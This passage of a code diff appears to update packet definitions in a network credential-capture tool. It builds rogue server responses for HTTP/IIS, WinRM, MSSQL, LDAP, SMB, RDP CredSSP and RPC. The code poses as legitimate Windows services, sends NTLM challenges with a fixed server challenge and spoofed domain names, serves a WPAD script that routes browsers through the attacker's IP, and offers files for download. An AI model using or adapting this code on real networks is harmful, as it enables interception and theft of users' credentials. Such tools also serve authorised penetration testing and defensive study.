+ +"""), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload2"])) + +class WinRM_NTLM_Challenge_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 401\r\n"), + ("WWWAuth", "WWW-Authenticate: Negotiate "), + ("Payload", ""), + ("Payload-CRLF", "\r\n"), + ("ServerType", "Server: Microsoft-HTTPAPI/2.0\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Len", "Content-Length: 0\r\n"), ("CRLF", "\r\n"), ]) @@ -247,27 +524,58 @@ class IIS_NTLM_Challenge_Ans(Packet): class IIS_Basic_401_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 401 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"), - ("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"), - ("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"), - ("Len", "Content-Length: 0\r\n"), - ("CRLF", "\r\n"), + ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), + ("Len", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", """ + + + +401 - Unauthorized: Access is denied due to invalid credentials. + + + + +
+
+

401 - Unauthorized: Access is denied due to invalid credentials.

+

You do not have permission to view this directory or page using the credentials that you supplied.

+
+
+ + +"""), ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) ##### Proxy mode Packets ##### class WPADScript(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 200 OK\r\n"), - ("ServerTlype", "Server: Microsoft-IIS/7.5\r\n"), - ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"), + ("Cache", "Pragma: no-cache\r\n"), + ("Server", "Server: BigIP\r\n"), ("ContentLen", "Content-Length: "), ("ActualLen", "76"), ("CRLF", "\r\n\r\n"), - ("Payload", "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"), + ("Payload", "function FindProxyForURL(url, host){return 'PROXY "+RespondWithIP()+":3141; DIRECT';}"), ]) def calculate(self): self.fields["ActualLen"] = len(str(self.fields["Payload"])) @@ -278,7 +586,7 @@ class ServeExeFile(Packet): ("ContentType", "Content-Type: application/octet-stream\r\n"), ("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"), ("AcceptRanges", "Accept-Ranges: bytes\r\n"), - ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("Server", "Server: Microsoft-IIS/10.0\r\n"), ("ContentDisp", "Content-Disposition: attachment; filename="), ("ContentDiFile", ""), ("FileCRLF", ";\r\n"), @@ -300,7 +608,7 @@ class ServeHtmlFile(Packet): ("ContentType", "Content-Type: text/html\r\n"), ("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"), ("AcceptRanges", "Accept-Ranges: bytes\r\n"), - ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("Server", "Server: Microsoft-IIS/10.0\r\n"), ("ContentLen", "Content-Length: "), ("ActualLen", "76"), ("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"), @@ -315,7 +623,7 @@ class ServeHtmlFile(Packet): class WPAD_Auth_407_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), @@ -331,7 +639,7 @@ class WPAD_Auth_407_Ans(Packet): class WPAD_NTLM_Challenge_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWWAuth", "Proxy-Authenticate: NTLM "), @@ -347,7 +655,7 @@ class WPAD_NTLM_Challenge_Ans(Packet): class WPAD_Basic_407_Ans(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 407 Unauthorized\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), ("Type", "Content-Type: text/html\r\n"), ("WWW-Auth", "Proxy-Authenticate: Basic realm=\"Authentication Required\"\r\n"), @@ -364,7 +672,7 @@ class WEBDAV_Options_Answer(Packet): fields = OrderedDict([ ("Code", "HTTP/1.1 200 OK\r\n"), ("Date", "Date: "+HTTPCurrentDate()+"\r\n"), - ("ServerType", "Server: Microsoft-IIS/7.5\r\n"), + ("ServerType", "Server: Microsoft-IIS/10.0\r\n"), ("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"), ("Len", "Content-Length: 0\r\n"), ("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"), @@ -417,18 +725,18 @@ class MSSQLPreLoginAnswer(Packet): InstOpOffset = EncryptionOffset+str(self.fields["EncryptionStr"]) ThrdIDOffset = InstOpOffset+str(self.fields["InstOptStr"]) - self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket)) + self.fields["Len"] = StructWithLenPython2or3(">h",len(CalculateCompletePacket)) #Version - self.fields["VersionLen"] = struct.pack(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"])) - self.fields["VersionOffset"] = struct.pack(">h",len(VersionOffset)) + self.fields["VersionLen"] = StructWithLenPython2or3(">h",len(self.fields["VersionStr"]+self.fields["SubBuild"])) + self.fields["VersionOffset"] = StructWithLenPython2or3(">h",len(VersionOffset)) #Encryption - self.fields["EncryptionLen"] = struct.pack(">h",len(self.fields["EncryptionStr"])) - self.fields["EncryptionOffset"] = struct.pack(">h",len(EncryptionOffset)) + self.fields["EncryptionLen"] = StructWithLenPython2or3(">h",len(self.fields["EncryptionStr"])) + self.fields["EncryptionOffset"] = StructWithLenPython2or3(">h",len(EncryptionOffset)) #InstOpt - self.fields["InstOptLen"] = struct.pack(">h",len(self.fields["InstOptStr"])) - self.fields["EncryptionOffset"] = struct.pack(">h",len(InstOpOffset)) + self.fields["InstOptLen"] = StructWithLenPython2or3(">h",len(self.fields["InstOptStr"])) + self.fields["EncryptionOffset"] = StructWithLenPython2or3(">h",len(InstOpOffset)) #ThrdIDOffset - self.fields["ThrdIDOffset"] = struct.pack(">h",len(ThrdIDOffset)) + self.fields["ThrdIDOffset"] = StructWithLenPython2or3(">h",len(ThrdIDOffset)) class MSSQLNTLMChallengeAnswer(Packet): fields = OrderedDict([ @@ -452,35 +760,35 @@ class MSSQLNTLMChallengeAnswer(Packet): ("TargetInfoLen", "\x7e\x00"), ("TargetInfoMaxLen", "\x7e\x00"), ("TargetInfoOffset", "\x3e\x00\x00\x00"), - ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), - ("TargetNameStr", "SMB"), + ("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"), + ("TargetNameStr", settings.Config.Domain), ("Av1", "\x02\x00"),#nbt name ("Av1Len", "\x06\x00"), - ("Av1Str", "SMB"), + ("Av1Str", settings.Config.Domain), ("Av2", "\x01\x00"),#Server name ("Av2Len", "\x14\x00"), - ("Av2Str", "SMB-TOOLKIT"), + ("Av2Str", settings.Config.MachineName), ("Av3", "\x04\x00"),#Full Domain name ("Av3Len", "\x12\x00"), - ("Av3Str", "smb.local"), + ("Av3Str", settings.Config.DomainName), ("Av4", "\x03\x00"),#Full machine domain name ("Av4Len", "\x28\x00"), - ("Av4Str", "server2003.smb.local"), + ("Av4Str", settings.Config.MachineName+'.'+settings.Config.DomainName), ("Av5", "\x05\x00"),#Domain Forest Name ("Av5Len", "\x12\x00"), - ("Av5Str", "smb.local"), + ("Av5Str", settings.Config.DomainName), ("Av6", "\x00\x00"),#AvPairs Terminator ("Av6Len", "\x00\x00"), ]) def calculate(self): # First convert to unicode - self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le') - self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') - self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') - self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') - self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') - self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') + self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le').decode('latin-1') + self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le').decode('latin-1') + self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le').decode('latin-1') + self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le').decode('latin-1') + self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le').decode('latin-1') + self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le').decode('latin-1') # Then calculate CalculateCompletePacket = str(self.fields["PacketType"])+str(self.fields["Status"])+str(self.fields["Len"])+str(self.fields["SPID"])+str(self.fields["PacketID"])+str(self.fields["Window"])+str(self.fields["TokenType"])+str(self.fields["SSPIBuffLen"])+str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])+str(self.fields["TargetNameStr"])+str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) @@ -489,29 +797,29 @@ class MSSQLNTLMChallengeAnswer(Packet): CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) - self.fields["Len"] = struct.pack(">h",len(CalculateCompletePacket)) - self.fields["SSPIBuffLen"] = struct.pack("h",len(CalculateCompletePacket)) + self.fields["SSPIBuffLen"] = StructWithLenPython2or3("i", len(CalculatePacketLen)) - self.fields["OpHeadASNIDLen"] = struct.pack(">i", len(OperationPacketLen)) - self.fields["SequenceHeaderLen"] = struct.pack(">B", len(NTLMMessageLen)) + self.fields["ParserHeadASNLen"] = StructWithLenPython2or3(">i", len(CalculatePacketLen)) + self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">i", len(OperationPacketLen)) + self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)) ##### Workstation Offset Calculation: - self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("B", len(CalculateNetlogonLen)) + self.fields["NetAttribLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+2) + self.fields["PartAttribHeadLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+18) + self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+24) + self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+32) + self.fields["ParserHeadASNLen"] = StructWithLenPython2or3(">L", len(CalculateNetlogonLen)+42) + ###### + self.fields["ClientSiteNamePtrOffset"] = StructWithLenPython2or3(">B", len(CalculateNetlogonOffset)-1) ##### SMB Packets ##### class SMBHeader(Packet): @@ -792,7 +1203,7 @@ class SMBNego(Packet): ]) def calculate(self): - self.fields["bcc"] = struct.pack("B", len(AsnLen+CalculateSecBlob)-3) - self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6) - self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) - self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"]))) - self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]))) - self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) + self.fields["SecBlobLen"] = StructWithLenPython2or3("B", len(AsnLen+CalculateSecBlob)-3) + self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-6) + self.fields["Tag1ASNIdLen"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag1ASNId2Len"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]))) + self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob)) ###### Andxoffset calculation. CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen - self.fields["Andxoffset"] = struct.pack(" 255: - self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob)) - else: - self.fields["Tag3ASNIdLenOfLen"] = "\x81" - self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) + if len(CalculateSecBlob) > 255: + self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">H", len(CalculateSecBlob)) + else: + self.fields["Tag3ASNIdLenOfLen"] = "\x81" + self.fields["Tag3ASNIdLen"] = StructWithLenPython2or3(">B", len(CalculateSecBlob)) - if len(AsnLen+CalculateSecBlob)-3 > 255: - self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4) - else: - self.fields["ChoiceTagASNLenOfLen"] = "\x81" - self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3) + if len(AsnLen+CalculateSecBlob)-3 > 255: + self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">H", len(AsnLen+CalculateSecBlob)-4) + else: + self.fields["ChoiceTagASNLenOfLen"] = "\x81" + self.fields["ChoiceTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-3) - if len(AsnLen+CalculateSecBlob)-7 > 255: - self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8) - else: - self.fields["NegTokenTagASNLenOfLen"] = "\x81" - self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7) + if len(AsnLen+CalculateSecBlob)-7 > 255: + self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">H", len(AsnLen+CalculateSecBlob)-8) + else: + self.fields["NegTokenTagASNLenOfLen"] = "\x81" + self.fields["NegTokenTagASNIdLen"] = StructWithLenPython2or3(">B", len(AsnLen+CalculateSecBlob)-7) - tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]) + tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"]) - if len(tag2length) > 255: - self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length)) - else: - self.fields["Tag2ASNIdLenOfLen"] = "\x81" - self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length)) + if len(tag2length) > 255: + self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">H", len(tag2length)) + else: + self.fields["Tag2ASNIdLenOfLen"] = "\x81" + self.fields["Tag2ASNIdLen"] = StructWithLenPython2or3(">B", len(tag2length)) - self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) - self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag1ASNIdLen"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"]))) + self.fields["Tag1ASNId2Len"] = StructWithLenPython2or3(">B", len(str(self.fields["Tag1ASNId2Str"]))) ###### Workstation Offset CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) @@ -1572,22 +1982,22 @@ class SMB2Session1Data(Packet): CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) ##### Workstation Offset Calculation: - self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("h",len(str(self.fields["Data"]))+4)#Data+own header. + +class X224(Packet): + fields = OrderedDict([ + ("Length", "\x0e"), + ("Cmd", "\xd0"), + ("Dstref", "\x00\x00"), + ("Srcref", "\x12\x34"), + ("Class", "\x00"), + ("Data", "") + ]) + + def calculate(self): + self.fields["Length"] = StructWithLenPython2or3(">B",len(str(self.fields["Data"]))+6) + + +class RDPNEGOAnswer(Packet): + fields = OrderedDict([ + ("Cmd", "\x02"), + ("Flags", "\x00"), + ("Length", "\x08\x00"), + ("SelectedProto", "\x02\x00\x00\x00"),#CredSSP + ]) + + def calculate(self): + self.fields["Length"] = StructWithLenPython2or3("B + ("PacketStartASNTag0", "\xa0"), + ("PacketStartASNTag0Len", "\x03"), #Static for TSVersion + ("PacketStartASNTag0Len2", "\x02"), + ("PacketStartASNTag0Len3", "\x01"), + ("PacketStartASNTag0CredSSPVersion", "\x05"),##TSVersion: Since padding oracle, v2,v3,v4 are rejected by win7.. + ("ParserHeadASNID1", "\xa1"), + ("ParserHeadASNLenOfLen1", "\x81"), + ("ParserHeadASNLen1", "\xfa"), + ("MessageIDASNID", "\x30"), + ("MessageIDASNLen", "\x81"), + ("MessageIDASNLen2", "\xf7"), + ("OpHeadASNID", "\x30"), + ("OpHeadASNIDLenOfLen", "\x81"), + ("OpHeadASNIDLen", "\xf4"), + ("StatusASNID", "\xa0"), + ("MatchedDN", "\x81"), + ("ASNLen01", "\xf1"), + ("SequenceHeader", "\x04"), + ("SequenceHeaderLenOfLen", "\x81"), + ("SequenceHeaderLen", "\xee"), + ####### + ("NTLMSSPSignature", "NTLMSSP"), + ("NTLMSSPSignatureNull", "\x00"), + ("NTLMSSPMessageType", "\x02\x00\x00\x00"), + ("NTLMSSPNtWorkstationLen", "\x1e\x00"), + ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), + ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), + ("NTLMSSPNtNegotiateFlags", "\x15\x82\x8a\xe2"), + ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), + ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("NTLMSSPNtTargetInfoLen", "\x94\x00"), + ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), + ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), + ("NegTokenInitSeqMechMessageVersionLow", "\x02"), + ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), + ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), + ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), + ("NTLMSSPNtWorkstationName", settings.Config.Domain), + ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), + ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), + ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", settings.Config.Domain), + ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), + ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", settings.Config.MachineName), + ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", settings.Config.MachineName+'.'+settings.Config.DomainName), + ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), + ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), + ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", settings.Config.DomainName), + ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), + ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), + ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", settings.Config.DomainName), + ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), + ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), + ]) + + def calculate(self): + + ###### Convert strings to Unicode first + self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le').decode('latin-1') + self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le').decode('latin-1') + + ###### Workstation Offset + CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) + ###### AvPairs Offset + CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) + + ###### RDP Packet Len + NTLMMessageLen = CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])+CalculateLenAvpairs + + ##### RDP Len Calculation: + + self.fields["SequenceHeaderLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)) + self.fields["ASNLen01"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+3) + self.fields["OpHeadASNIDLen"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+6) + self.fields["MessageIDASNLen2"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+9) + self.fields["ParserHeadASNLen1"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+12) + self.fields["PacketStartASNStr"] = StructWithLenPython2or3(">B", len(NTLMMessageLen)+20) + + ##### Workstation Offset Calculation: + self.fields["NTLMSSPNtWorkstationBuffOffset"] = StructWithLenPython2or3("H", self.fields["TowerPortNumberStr"]) + self.fields["TowerIPAddressStr"] = RespondWithIPAton() + + Data= str(self.fields["TowerTotalLen"])+str(self.fields["Tower1Len"])+str(self.fields["Tower1FloorsCount"])+str(self.fields["Tower1ByteCount"])+str(self.fields["Tower1IntUID"])+str(self.fields["Tower1UID"])+str(self.fields["Tower1Version"])+str(self.fields["Tower1VersionMinBC"])+str(self.fields["Tower1VersionMinimum"])+str(self.fields["Tower2ByteCount"])+str(self.fields["Tower2IntUID"])+str(self.fields["Tower2UID"])+str(self.fields["Tower2Version"])+str(self.fields["Tower2VersionMinBC"])+str(self.fields["Tower2VersionMinimum"])+str(self.fields["TowerRpcByteCount"])+str(self.fields["TowerRpctIdentifier"])+str(self.fields["TowerRpcByteCount2"])+str(self.fields["TowerRpcMinimum"])+str(self.fields["TowerPortNumberBC"])+str(self.fields["TowerPortNumberOpcode"])+str(self.fields["TowerPortNumberBC2"])+str(self.fields["TowerPortNumberStr"])+str(self.fields["TowerIPAddressBC"])+str(self.fields["TowerIPAd